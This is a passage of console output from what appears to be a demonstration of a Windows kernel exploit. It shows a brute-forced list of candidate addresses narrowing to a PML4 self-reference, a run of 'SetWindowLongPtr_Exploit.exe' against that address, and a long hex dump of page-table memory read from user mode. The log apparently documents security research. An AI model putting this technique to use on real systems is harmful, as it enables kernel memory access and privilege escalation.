ffffa7d3e9f4fa78\r\nLeft in Potential Array: ffffa8542a150a80\r\nLeft in Potential Array: ffffa8d46a351a88\r\nLeft in Potential Array: ffffa954aa552a90\r\nLeft in Potential Array: ffffa9d4ea753a98\r\nLeft in Potential Array: ffffaa552a954aa0\r\nLeft in Potential Array: ffffaad56ab55aa8\r\nLeft in Potential Array: ffffab55aad56ab0\r\nLeft in Potential Array: ffffabd5eaf57ab8\r\nLeft in Potential Array: 
ffffac562b158ac0\r\nLeft in Potential Array: ffffacd66b359ac8\r\nLeft in Potential Array: ffffad56ab55aad0\r\nLeft in Potential Array: ffffadd6eb75bad8\r\nLeft in Potential Array: ffffae572b95cae0\r\nLeft in Potential Array: ffffaed76bb5dae8\r\nLeft in Potential Array: ffffaf57abd5eaf0\r\nLeft in Potential Array: ffffafd7ebf5faf8\r\nLeft in Potential Array: ffffb0582c160b00\r\nLeft in Potential Array: ffffb0d86c361b08\r\nLeft in Potential Array: ffffb158ac562b10\r\nLeft in Potential Array: ffffb1d8ec763b18\r\nLeft in Potential Array: ffffb2592c964b20\r\nLeft in Potential Array: ffffb2d96cb65b28\r\nLeft in Potential Array: ffffb359acd66b30\r\nLeft in Potential Array: ffffb3d9ecf67b38\r\nLeft in Potential Array: ffffb45a2d168b40\r\nLeft in Potential Array: ffffb4da6d369b48\r\nLeft in Potential Array: ffffb55aad56ab50\r\nLeft in Potential Array: ffffb5daed76bb58\r\nLeft in Potential Array: ffffb65b2d96cb60\r\nLeft in Potential Array: ffffb6db6db6db68\r\nLeft in Potential Array: ffffb75badd6eb70\r\nLeft in Potential Array: ffffb7dbedf6fb78\r\nLeft in Potential Array: ffffb85c2e170b80\r\nLeft in Potential Array: ffffb8dc6e371b88\r\nLeft in Potential Array: ffffb95cae572b90\r\nLeft in Potential Array: ffffb9dcee773b98\r\nLeft in Potential Array: ffffba5d2e974ba0\r\nLeft in Potential Array: ffffbadd6eb75ba8\r\nLeft in Potential Array: ffffbb5daed76bb0\r\nLeft in Potential Array: ffffbbddeef77bb8\r\nLeft in Potential Array: ffffbc5e2f178bc0\r\nLeft in Potential Array: ffffbcde6f379bc8\r\nLeft in Potential Array: ffffbd5eaf57abd0\r\nLeft in Potential Array: ffffbddeef77bbd8\r\nLeft in Potential Array: ffffbe5f2f97cbe0\r\nLeft in Potential Array: ffffbedf6fb7dbe8\r\nLeft in Potential Array: ffffbf5fafd7ebf0\r\nLeft in Potential Array: ffffbfdfeff7fbf8\r\nLeft in Potential Array: ffffc06030180c00\r\nLeft in Potential Array: ffffc0e070381c08\r\nLeft in Potential Array: ffffc160b0582c10\r\nLeft in Potential Array: ffffc1e0f0783c18\r\nLeft in Potential Array: 
ffffc26130984c20\r\nLeft in Potential Array: ffffc2e170b85c28\r\nLeft in Potential Array: ffffc361b0d86c30\r\nLeft in Potential Array: ffffc3e1f0f87c38\r\nLeft in Potential Array: ffffc46231188c40\r\nLeft in Potential Array: ffffc4e271389c48\r\nLeft in Potential Array: ffffc562b158ac50\r\nLeft in Potential Array: ffffc5e2f178bc58\r\nLeft in Potential Array: ffffc6633198cc60\r\nLeft in Potential Array: ffffc6e371b8dc68\r\nLeft in Potential Array: ffffc763b1d8ec70\r\nLeft in Potential Array: ffffc7e3f1f8fc78\r\nLeft in Potential Array: ffffc86432190c80\r\nLeft in Potential Array: ffffc8e472391c88\r\nLeft in Potential Array: ffffc964b2592c90\r\nLeft in Potential Array: ffffc9e4f2793c98\r\nLeft in Potential Array: ffffca6532994ca0\r\nLeft in Potential Array: ffffcae572b95ca8\r\nLeft in Potential Array: ffffcb65b2d96cb0\r\nLeft in Potential Array: ffffcbe5f2f97cb8\r\nLeft in Potential Array: ffffcc6633198cc0\r\nLeft in Potential Array: ffffcce673399cc8\r\nLeft in Potential Array: ffffcd66b359acd0\r\nLeft in Potential Array: ffffcde6f379bcd8\r\nLeft in Potential Array: ffffce673399cce0\r\nLeft in Potential Array: ffffcee773b9dce8\r\nLeft in Potential Array: ffffcf67b3d9ecf0\r\nLeft in Potential Array: ffffcfe7f3f9fcf8\r\nLeft in Potential Array: ffffd068341a0d00\r\nLeft in Potential Array: ffffd0e8743a1d08\r\nLeft in Potential Array: ffffd168b45a2d10\r\nLeft in Potential Array: ffffd1e8f47a3d18\r\nLeft in Potential Array: ffffd269349a4d20\r\nLeft in Potential Array: ffffd2e974ba5d28\r\nLeft in Potential Array: ffffd369b4da6d30\r\nLeft in Potential Array: ffffd3e9f4fa7d38\r\nLeft in Potential Array: ffffd46a351a8d40\r\nLeft in Potential Array: ffffd4ea753a9d48\r\nLeft in Potential Array: ffffd56ab55aad50\r\nLeft in Potential Array: ffffd5eaf57abd58\r\nLeft in Potential Array: ffffd66b359acd60\r\nLeft in Potential Array: ffffd6eb75badd68\r\nLeft in Potential Array: ffffd76bb5daed70\r\nLeft in Potential Array: ffffd7ebf5fafd78\r\nLeft in Potential Array: 
ffffd86c361b0d80\r\nLeft in Potential Array: ffffd8ec763b1d88\r\nLeft in Potential Array: ffffd96cb65b2d90\r\nLeft in Potential Array: ffffd9ecf67b3d98\r\nLeft in Potential Array: ffffda6d369b4da0\r\nLeft in Potential Array: ffffdaed76bb5da8\r\nLeft in Potential Array: ffffdb6db6db6db0\r\nLeft in Potential Array: ffffdbedf6fb7db8\r\nLeft in Potential Array: ffffdc6e371b8dc0\r\nLeft in Potential Array: ffffdcee773b9dc8\r\nLeft in Potential Array: ffffdd6eb75badd0\r\nLeft in Potential Array: ffffddeef77bbdd8\r\nLeft in Potential Array: ffffde6f379bcde0\r\nLeft in Potential Array: ffffdeef77bbdde8\r\nLeft in Potential Array: ffffdf6fb7dbedf0\r\nLeft in Potential Array: ffffdfeff7fbfdf8\r\nLeft in Potential Array: ffffe070381c0e00\r\nLeft in Potential Array: ffffe0f0783c1e08\r\nLeft in Potential Array: ffffe170b85c2e10\r\nLeft in Potential Array: ffffe1f0f87c3e18\r\nLeft in Potential Array: ffffe271389c4e20\r\nLeft in Potential Array: ffffe2f178bc5e28\r\nLeft in Potential Array: ffffe371b8dc6e30\r\nLeft in Potential Array: ffffe3f1f8fc7e38\r\nLeft in Potential Array: ffffe472391c8e40\r\nLeft in Potential Array: ffffe4f2793c9e48\r\nLeft in Potential Array: ffffe572b95cae50\r\nLeft in Potential Array: ffffe5f2f97cbe58\r\nLeft in Potential Array: ffffe673399cce60\r\nLeft in Potential Array: ffffe6f379bcde68\r\nLeft in Potential Array: ffffe773b9dcee70\r\nLeft in Potential Array: ffffe7f3f9fcfe78\r\nLeft in Potential Array: ffffe8743a1d0e80\r\nLeft in Potential Array: ffffe8f47a3d1e88\r\nLeft in Potential Array: ffffe974ba5d2e90\r\nLeft in Potential Array: ffffe9f4fa7d3e98\r\nLeft in Potential Array: ffffea753a9d4ea0\r\nLeft in Potential Array: ffffeaf57abd5ea8\r\nLeft in Potential Array: ffffeb75badd6eb0\r\nLeft in Potential Array: ffffebf5fafd7eb8\r\nLeft in Potential Array: ffffec763b1d8ec0\r\nLeft in Potential Array: ffffecf67b3d9ec8\r\nLeft in Potential Array: ffffed76bb5daed0\r\nLeft in Potential Array: ffffedf6fb7dbed8\r\nLeft in Potential Array: 
ffffee773b9dcee0\r\nLeft in Potential Array: ffffeef77bbddee8\r\nLeft in Potential Array: ffffef77bbddeef0\r\nLeft in Potential Array: ffffeff7fbfdfef8\r\nLeft in Potential Array: fffff0783c1e0f00\r\nLeft in Potential Array: fffff0f87c3e1f08\r\nLeft in Potential Array: fffff178bc5e2f10\r\nLeft in Potential Array: fffff1f8fc7e3f18\r\nLeft in Potential Array: fffff2793c9e4f20\r\nLeft in Potential Array: fffff2f97cbe5f28\r\nLeft in Potential Array: fffff379bcde6f30\r\nLeft in Potential Array: fffff3f9fcfe7f38\r\nLeft in Potential Array: fffff47a3d1e8f40\r\nLeft in Potential Array: fffff4fa7d3e9f48\r\nLeft in Potential Array: fffff57abd5eaf50\r\nLeft in Potential Array: fffff5fafd7ebf58\r\nLeft in Potential Array: fffff6fb7dbedf68\r\nLeft in Potential Array: fffff77bbddeef70\r\nLeft in Potential Array: fffff7fbfdfeff78\r\nLeft in Potential Array: fffff87c3e1f0f80\r\nLeft in Potential Array: fffff8fc7e3f1f88\r\nLeft in Potential Array: fffff97cbe5f2f90\r\nLeft in Potential Array: fffff9fcfe7f3f98\r\nLeft in Potential Array: fffffa7d3e9f4fa0\r\nLeft in Potential Array: fffffafd7ebf5fa8\r\nLeft in Potential Array: fffffb7dbedf6fb0\r\nLeft in Potential Array: fffffbfdfeff7fb8\r\nLeft in Potential Array: fffffc7e3f1f8fc0\r\nLeft in Potential Array: fffffcfe7f3f9fc8\r\nLeft in Potential Array: fffffd7ebf5fafd0\r\nLeft in Potential Array: fffffdfeff7fbfd8\r\nLeft in Potential Array: fffffe7f3f9fcfe0\r\nLeft in Potential Array: fffffeff7fbfdfe8\r\nLeft in Potential Array: ffffff7fbfdfeff0\r\nLeft in Potential Array: fffffffffffffff8\r\nLeft in Final Array: fffff67b3d9ecf60\r\nResult: fffff67b3d9ecf60\r\nRun SetWindowLongPtr_Exploit.exe\r\nC:\\Users\\qa\\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60\r\nMy PID is: 6056\r\nCurrent Username: qa\r\nPML4 Self Ref: FFFFF67B3D9ECF60\r\nEnter to continue...\r\n \r\n Value Self Ref = 8000000100211867\r\n000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....\r\n000000003D9EC010 | 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............\r\n000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 
................\r\n000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2E0 | 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 | ................\r\n000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5B0 
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 | ................\r\n000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.\r\n000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......\r\n000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......\r\n000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....\r\n000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............\r\n000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 
................\r\n000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............\r\n000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....\r\n000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9E0 | 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....\r\n000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......\r\n000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 | ................\r\n000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............\r\n000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 